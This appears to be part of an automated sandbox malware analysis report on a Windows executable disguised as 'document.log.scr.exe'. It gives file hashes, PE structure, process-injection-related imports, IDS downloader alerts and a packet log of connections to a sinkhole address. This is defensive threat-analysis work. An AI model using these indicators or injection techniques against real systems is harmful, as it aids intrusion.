                                                                • 98.137.87.77
                                                                mirai.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 98.138.234.211
                                                                Crt09EgZK3.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.75
                                                                Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                                • 74.6.231.21
                                                                z3hir.arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 216.252.107.80
                                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                • 74.6.231.21
                                                                OPgjjiInNK.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.76
                                                                rXTqHar5Ud.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.74
                                                                Tsunami.arm.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.87.86
                                                                2FnvReiPU6.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.91
                                                                YAHOO-GQ1USmips.elfGet hashmaliciousUnknownBrowse
                                                                • 98.137.238.195
                                                                2RXgLC0ir2.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 98.137.12.116
                                                                Q137zuCNxh.elfGet hashmaliciousMiraiBrowse
                                                                • 74.6.200.172
                                                                uMlLpvdLRU.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.109
                                                                6foBmRMlDy.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.106
                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.186.231
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 98.139.117.51
                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                • 98.137.77.120
                                                                Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                                                                • 74.6.160.106
                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                • 98.137.11.164
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):88577
                                                                Entropy (8bit):6.642961349064588
                                                                Encrypted:false
                                                                SSDEEP:1536:AUQXuu3bm+zpKAfC/RIUYTjjeldZuZy3N7j5yVvrnxBwaBRnK0Ya4nq38n53AhdI:BQ+Spzp9aRej6ldQaHUFrnxe4k02XATI
                                                                MD5:409E8228898074DF3359B7BFAEEAF8F2
                                                                SHA1:8FC29528A259BECBB50EB09B15860D28D0D68A8F
                                                                SHA-256:E556363134A45CD99DD7F58CBBFA6DEC723205F8C5BFBFEC41A68D70F05F29AA
                                                                SHA-512:BC3E9A68B3850BB813B5CB3AC517D9AE0D3729B43B74178E0F43BA9EADB98320EE698049AC2C6E561B6ADC55A7FBE436169868FD6CE6B30871518BD4DC00F703
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):423046
                                                                Entropy (8bit):4.098108107355895
                                                                Encrypted:false
                                                                SSDEEP:3072:DFZ5qVGXvEQU+dXmEUy9rfe3kUdKSh7hKNjf7CwhqjEr8IcGN8yGBYPosqkxOqoS:JjqVG/pJZzfwsGX+LOOD3Os
                                                                MD5:203E91D369913B5768296E416B0C86D5
                                                                SHA1:91FF86480474CBC5B49644700674440F8691B59F
                                                                SHA-256:99145DA1ACE397A51D6ED5BD96E1C0167554E6E4028F58A20DDC091DED0FAFBE
                                                                SHA-512:D1FEF688FCB78C44B514D0A02505CF6F5F9A591FBBE55946F18C7A3AE979FA126B102D229BC50FB4BA7143516D4EA59CC32662FF545718156BDFEE2D9219F3B7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 95%
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\document.log.scr.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):4.098108107355895
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:document.log.scr.exe
                                                                File size:423'046 bytes
                                                                MD5:203e91d369913b5768296e416b0c86d5
                                                                SHA1:91ff86480474cbc5b49644700674440f8691b59f
                                                                SHA256:99145da1ace397a51d6ed5bd96e1c0167554e6e4028f58a20ddc091ded0fafbe
                                                                SHA512:d1fef688fcb78c44b514d0a02505cf6f5f9a591fbbe55946f18c7a3ae979fa126b102d229bc50fb4ba7143516d4ea59cc32662ff545718156bdfee2d9219f3b7
                                                                SSDEEP:3072:DFZ5qVGXvEQU+dXmEUy9rfe3kUdKSh7hKNjf7CwhqjEr8IcGN8yGBYPosqkxOqoS:JjqVG/pJZzfwsGX+LOOD3Os
                                                                TLSH:CB948D61F28DC1B1E44A1DB5B8AC936662B27D28173CABF3BB507F09A5732D07C31916
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............fr..fr..fr..n...fr..j}..fr..n/..fr.jn/..fr..fs.wfr..j-..fr..j...fr..m,..fr..j(..fr.Rich.fr.................PE..L... ?.E...
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x425d91
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:
                                                                Time Stamp:0x45113F20 [Wed Sep 20 13:16:16 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:547cd05356c429dc57b17bf0fd6daf12
                                                                Instruction
                                                                push 00000060h
                                                                push 0042E598h
                                                                call 00007F22E4B59AE4h
                                                                mov edi, 00000094h
                                                                mov eax, edi
                                                                call 00007F22E4B5893Ch
                                                                mov dword ptr [ebp-18h], esp
                                                                mov esi, esp
                                                                mov dword ptr [esi], edi
                                                                push esi
                                                                call dword ptr [0042E0ECh]
                                                                mov ecx, dword ptr [esi+10h]
                                                                mov dword ptr [00432214h], ecx
                                                                mov eax, dword ptr [esi+04h]
                                                                mov dword ptr [00432220h], eax
                                                                mov edx, dword ptr [esi+08h]
                                                                mov dword ptr [00432224h], edx
                                                                mov esi, dword ptr [esi+0Ch]
                                                                and esi, 00007FFFh
                                                                mov dword ptr [00432218h], esi
                                                                cmp ecx, 02h
                                                                je 00007F22E4B5923Eh
                                                                or esi, 00008000h
                                                                mov dword ptr [00432218h], esi
                                                                shl eax, 08h
                                                                add eax, edx
                                                                mov dword ptr [0043221Ch], eax
                                                                xor esi, esi
                                                                push esi
                                                                mov edi, dword ptr [0042E0BCh]
                                                                call edi
                                                                cmp word ptr [eax], 5A4Dh
                                                                jne 00007F22E4B59251h
                                                                mov ecx, dword ptr [eax+3Ch]
                                                                add ecx, eax
                                                                cmp dword ptr [ecx], 00004550h
                                                                jne 00007F22E4B59244h
                                                                movzx eax, word ptr [ecx+18h]
                                                                cmp eax, 0000010Bh
                                                                je 00007F22E4B59251h
                                                                cmp eax, 0000020Bh
                                                                je 00007F22E4B59237h
                                                                mov dword ptr [ebp-1Ch], esi
                                                                jmp 00007F22E4B59259h
                                                                cmp dword ptr [ecx+00000084h], 0Eh
                                                                jbe 00007F22E4B59224h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000F8h], esi
                                                                jmp 00007F22E4B59240h
                                                                cmp dword ptr [ecx+74h], 0Eh
                                                                jbe 00007F22E4B59214h
                                                                xor eax, eax
                                                                cmp dword ptr [ecx+000000E8h], esi
                                                                setne al
                                                                mov dword ptr [ebp-1Ch], eax
                                                                Programming Language:
                                                                • [ASM] VS2003 (.NET) build 3077
                                                                • [ C ] VS2003 (.NET) build 3077
                                                                • [C++] VS2003 (.NET) build 3077
                                                                • [RES] VS2003 (.NET) build 3077
                                                                • [LNK] VS2003 (.NET) build 3077
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30204 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x30118 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2f6d0 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2e000 | 0x24c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c5a4 | 0x2d000 | d7d3452993b82ee75052e80e49c890e4 | False | 0.5532931857638889 | data | 6.353296576388688 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2e000 | 0x2efc | 0x3000 | 48995658de018e8713b6cf36f411ca2e | False | 0.3614908854166667 | data | 4.955424298416429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x31000 | 0x28c0 | 0x1000 | cac477c02821e1eee50e0d1240a07368 | False | 0.211669921875 | Matlab v4 mat-file (little endian), numeric, rows 4351131, columns 4380016 | 1.9793888897922702 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x34000 | 0x30118 | 0x31000 | 4e7d528ce916727be35809bf9797978b | False | 0.05013851243622449 | data | 0.5968541437656842 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
- | 0x61518 | 0x2c00 | data | English | United States | 0.10884232954545454
- | 0x39f18 | 0xf000 | data | English | United States | 0.022721354166666666
RT_ICON | 0x34320 | 0x2e8 | ISO-8859 text, with very long lines (744), with no line terminators | English | United States | 0.020161290322580645
RT_ICON | 0x34608 | 0xffffff28 | data | English | United States | 0.04951295440851577
DLL | Import
KERNEL32.dll | WriteProcessMemory, VirtualAllocEx, lstrlenA, OpenProcess, Process32Next, Process32First, CreateToolhelp32Snapshot, GetFileAttributesA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, UnmapViewOfFile, GetFileSize, MapViewOfFile, CreateFileMappingA, FindClose, FindNextFileA, lstrcmpA, GetLastError, FindFirstFileA, lstrcpyA, SetFilePointer, ReadFile, GetTimeZoneInformation, GetModuleHandleA, LoadLibraryA, GetModuleFileNameA, GetCurrentDirectoryA, MoveFileExA, CopyFileA, GetOverlappedResult, LockResource, SizeofResource, LoadResource, FindResourceA, ResetEvent, GetVersionExA, HeapReAlloc, IsBadWritePtr, GetVolumeInformationA, DeviceIoControl, DefineDosDeviceA, QueryDosDeviceA, SetEndOfFile, GetProcAddress, CreateRemoteThread, GetCurrentProcess, CreateMutexA, ReleaseMutex, GetProcessHeap, HeapAlloc, Sleep, CloseHandle, GetTempPathA, GetTempFileNameA, WriteFile, CreateProcessA, DeleteFileA, HeapFree, GetLocalTime, CreateThread, CreateEventA, WaitForMultipleObjects, SetEvent, WaitForSingleObject, ExpandEnvironmentStringsA, CreateFileA, GetTickCount, ExitProcess, RtlUnwind, RaiseException, GetStartupInfoA, GetCommandLineA, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TlsAlloc, SetLastError, TlsFree, TlsSetValue, TlsGetValue, SetUnhandledExceptionFilter, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InterlockedExchange, VirtualQuery, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, TerminateProcess, HeapSize, VirtualProtect, GetSystemInfo, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, IsBadReadPtr, IsBadCodePtr, GetACP, GetOEMCP, GetCPInfo, InitializeCriticalSection, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, FlushFileBuffers
USER32.dll | wsprintfA, MessageBoxA, SetWindowsHookExA
ADVAPI32.dll | RegOpenKeyA, RegEnumKeyExA, InitializeSecurityDescriptor, GetTokenInformation, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, AllocateAndInitializeSid, GetLengthSid, AddAce, IsValidSecurityDescriptor, QueryServiceStatusEx, OpenSCManagerA, OpenServiceA, CloseServiceHandle, RegDeleteValueA, RegSetValueExA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T15:26:15.935513+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 50037 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:15.935513+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 50037 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:15.935513+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 50036 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:15.935513+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 50036 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:28.058727+0100 | 2016998 | ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) | 1 | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:28.951208+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:28.951208+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:31.150846+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49732 | TCP
2024-10-31T15:26:37.558372+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49733 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:37.558372+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49733 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:46.221781+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49739 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:46.221781+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49739 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.839417+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49742 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.839417+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49742 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.851261+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | TCP
2024-10-31T15:26:54.851261+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.434045+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49744 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.434045+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49744 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.467045+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:03.467045+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:10.072282+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 49750 | TCP
2024-10-31T15:27:12.073717+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.073717+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.094487+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49747 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:12.094487+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49747 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771757+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49763 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771757+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49763 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771888+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49762 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:20.771888+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49762 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.358961+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49807 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.358961+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49807 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.372531+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49808 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:29.372531+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49808 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.966563+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49849 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.966563+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49849 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.973451+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49850 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:37.973451+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49850 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095297+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49896 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095297+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49896 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095324+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49894 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:47.095324+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49894 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.713359+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49937 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.713359+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49937 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.714932+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49936 | 193.166.255.171 | 80 | TCP
2024-10-31T15:27:55.714932+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49936 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.318931+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49982 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.318931+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49982 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.322584+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49981 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:04.322584+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49981 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.965052+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 50027 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.965052+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 50027 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.976431+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 50028 | 193.166.255.171 | 80 | TCP
2024-10-31T15:28:12.976431+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 50028 | 193.166.255.171 | 80 | TCP
                                                                Oct 31, 2024 15:27:37.980624914 CET8049850193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.510632038 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.517055035 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.517143965 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.523509979 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.528378963 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.528460026 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.541481972 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.542469025 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:38.546916008 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:38.547504902 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:43.451121092 CET4984225192.168.2.467.195.228.94
                                                                Oct 31, 2024 15:27:45.951105118 CET4985825192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:47.095177889 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.095195055 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.095297098 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095324039 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095359087 CET4989680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.095401049 CET4989480192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.102680922 CET8049896193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.102816105 CET8049894193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.202682018 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.203018904 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207772017 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.207870007 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207916021 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.207947016 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.207978010 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.208086967 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:47.212759018 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:47.212833881 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:49.452737093 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:50.466758013 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:51.951534033 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:52.466764927 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:52.951122046 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:54.951164961 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:27:55.713185072 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.713359118 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.713479042 CET4993780192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.714853048 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.714931965 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.715009928 CET4993680192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.718272924 CET8049937193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.720273972 CET8049936193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.828031063 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.828340054 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833177090 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.833419085 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833419085 CET4998180192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833537102 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.833590984 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.833657980 CET4998280192.168.2.4193.166.255.171
                                                                Oct 31, 2024 15:27:55.838495970 CET8049981193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:55.839205027 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:27:56.466772079 CET4995025192.168.2.4142.251.1.26
                                                                Oct 31, 2024 15:27:58.951159954 CET4996325192.168.2.4142.250.153.26
                                                                Oct 31, 2024 15:28:04.318834066 CET8049982193.166.255.171192.168.2.4
                                                                Oct 31, 2024 15:28:04.318931103 CET4998280192.168.2.4193.166.255.171
